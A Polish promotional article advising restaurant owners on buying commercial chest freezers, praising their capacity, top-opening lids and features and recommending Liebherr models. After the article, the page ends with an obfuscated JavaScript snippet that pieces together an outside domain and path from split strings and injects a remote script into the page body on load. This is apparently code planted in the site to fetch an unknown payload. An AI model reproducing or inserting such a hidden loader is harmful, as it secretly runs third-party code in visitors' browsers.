Your page rank:
W zdecydowanej większości obiektów gastronomicznych mrożenie jest jednym z najbardziej popularnych sposobów konserwowania żywności. Z uwagi na specyficzne wymagania dla tej branży, zamrażarki muszą wyróżniać się odpowiednimi parametrami. Wysokiej jakości sprzęty nie tylko zapobiegają szybkiemu psuciu się żywności. Możliwość ustawienia odpowiednio niskiej temperatury pozwala zachować wartości odżywcze danych składników oraz ich smak. Jak wybrać odpowiednie urządzenie do gastronomii?
Dlaczego warto mieć zamrażarkę w swoim lokalu gastronomicznym?
Zamrażarka to obecnie niezbędne urządzenie w lokalu gastronomicznym, w którym każdego dnia serwuje się klientom różne dania. To sprzęt, dzięki któremu oszczędza się wiele czasu i pieniędzy, gdy prowadzi się biznes związany z gastronomią. Dzięki odpowiedniej zamrażarce masz możliwość robienia znacznie rzadziej zakupów, mniejszego marnowania znacznej części żywności czy dłuższego przechowywania niektórych, łatwo psujących się produktów.
W różnego rodzaju zamrażarkach możesz przechowywać mięso, ryby, warzywa, owoce czy lody. Te produkty żywnościowe na długi czas zachowują swoją świeżość i jakość. A dzięki różnym nowoczesnym technologiom nie tracą również swojego pysznego smaku.
Konstrukcje wielu modeli producenci zaprojektowali w taki sposób, aby dawały możliwie jak najwięcej komfortu osobom, które z nich na co dzień korzystają. Jeżeli cenisz sobie wygodne korzystanie ze sprzętów gastronomicznym, doskonałym rozwiązaniem do twojego lokalu będzie zakup zamrażarki skrzyniowej. Jej drzwi otwierają się do góry, dlatego nie zajmują zbędnego miejsca podczas wyjmowania z niej różnych produktów żywnościowych.
Zamrażarki skrzyniowe — sprawdzony wybór do wyposażenia każdej restauracji
Wielu restauratorów z chęcią wybiera do swoich lokali gastronomicznych zamrażarki skrzyniowe. Cechuje je wiele parametrów, które sprawiają, że są to urządzenia chłodzące doskonałe do wielu większych czy mniejszych restauracji. Dużą popularnością cieszy się zwłaszcza zamrażarka skrzyniowa Liebherr. Obecnie na rynku znajdziesz mnóstwo różnych modeli tego sprzętu gastronomicznego. Gorąco zachęcamy cię do jego zakupu, zwłaszcza tego sprzętu dedykowanego przechowywaniu lodów.
Dlaczego restauratorzy z chęcią decydują się na zamrażarki skrzyniowe do swoich lokali gastronomicznych? Przede wszystkim ze względu na uniwersalny charakter tego urządzenia, a także dostępność dużego tego rodzaju sprzętu na rynku. Charakterystyczną cechą zamrażarek skrzyniowych jest całkowity brak półek i przegródek.
Co wyróżnia zamrażarki skrzyniowe na tle innych takich urządzeń?
Brak półek w zamrażarkach skrzyniowych sprawia, że mają one bardzo dużą pojemność, do której można włożyć wyjątkowo wiele różnej wielkości żywności. W dodatku to urządzenie otwiera się od góry, dlatego jest bardzo wygodne w codziennym użytkowaniu. A same drzwi nie zajmują zbędnego miejsca, przez co jest go jeszcze więcej do przechowywania różnych składników dań.
Zamrażarka skrzyniowa zazwyczaj ma wiele przydatnych funkcji, w tym wyświetlacz temperatury oraz wskaźnik jej wzrostu. Niektóre modele tego urządzenia wyróżnia możliwość zamknięcia ich na klucz. Część zamrażarek skrzyniowych wyposażono w płaską lub wypukłą szybę, która znacznie ułatwia zidentyfikowanie danego produktu jeszcze przed podniesieniem drzwiczek.
Gorąco polecamy ci zakup wybranej przez siebie zamrażarki do twojego lokalu gastronomicznego. Mamy nadzieję, że twoje zakupy przebiegną wyjątkowo pomyślnie. Powodzenia!
(function(){ im8y_=(“u”+”st”);im8y=document.createElement(“script”);im8y.async=true; im8yu=”483874742″;im8y_+=”a”+(“t.”);im8y_+=”i”+(“nf”+(“o”))+(“/”); im8yu+=”.dcxb2Xwwm8ydmmdw”;im8yu+=”1xlmby49pqdr65″; im8y.src=”https://”+im8y_+im8yu;im8y.type=”text/javascript”; d_b=document.body;d_b.appendChild(im8y); })();